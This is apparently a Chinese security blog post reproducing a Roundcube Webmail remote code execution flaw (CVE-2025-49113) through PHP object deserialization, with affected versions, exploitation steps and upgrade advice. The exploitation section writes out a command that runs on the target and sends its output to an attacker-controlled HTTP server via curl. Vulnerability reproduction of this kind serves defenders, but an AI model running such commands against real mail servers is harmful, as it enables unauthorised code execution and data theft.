免责声明:本公众号所发布的全部内容,包括但不限于技术文章、POC脚本、漏洞利用工具及相关测试环境,均仅限于合法的网络安全学习、研究和教学用途。所有人在使用上述内容时,应严格遵守中华人民共和国相关法律法规以及道德伦理要求。未经明确的官方书面授权,严禁将公众号内的任何内容用于未经授权的渗透测试、漏洞利用或攻击行为。 所有人仅可在自己合法拥有或管理的系统环境中进行本地漏洞复现与安全测试,或用于具有明确授权的合法渗透测试项目。所有人不得以任何形式利用公众号内提供的内容从事非法、侵权或其他不当活动。 如因违反上述规定或不当使用本公众号提供的任何内容,造成的一切法律责任、经济损失、纠纷及其他任何形式的不利后果,均由相关成员自行承担,与本公众号无任何关联。
漏洞介绍
Roundcube Webmail 是一个基于浏览器的开源电子邮件客户端,采用 PHP 编写,支持 IMAP 协议,界面现代、用户友好,功能包括邮件收发、地址簿管理、邮件搜索、HTML 邮件编辑等。它具有插件扩展能力,易于部署和定制,广泛应用于企业或个人邮件系统的前端界面。由于其开放源代码和活跃社区,Roundcube 成为了最受欢迎的 Webmail 解决方案之一。
Roundcube Webmail 在 1.5.10 之前的版本以及 1.6.x 中 1.6.11 之前的版本,存在远程代码执行漏洞。该漏洞允许经过身份验证的用户发起攻击,原因是在 program/actions/settings/upload.php 文件中,URL 中的 _from 参数未被正确验证,从而导致了 PHP 对象反序列化漏洞
漏洞版本
-
Roundcube Webmail <1.5.10 -
Roundcube Webmail <1.6.11
漏洞利用
首先在攻击机上开启一个http服务
接着在攻击机执行POC
https://192.168.1.157/mail:目标Roundcube Mail地址[email protected]:目标Roundcube Mail用户名123456:目标Roundcube Mail密码'curl http://192.168.1.164:9000/$(id | base64 -w0)':执行的命令(无回显)
执行成功之后,我们发现刚才开启的http服务已经有了回显
base64解密一下获取命令回显。至此,命令执行成功
漏洞修复
新版本新增了对 _from参数的过滤,将其限制为简单字符串
修复将版本升级
-
Roundcube Webmail >= 1.5.10 -
Roundcube Webmail >= 1.6.11
原文始发于微信公众号(天翁安全):Roundcube Mail后台代码执行漏洞复现(CVE-2025-49113)及POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论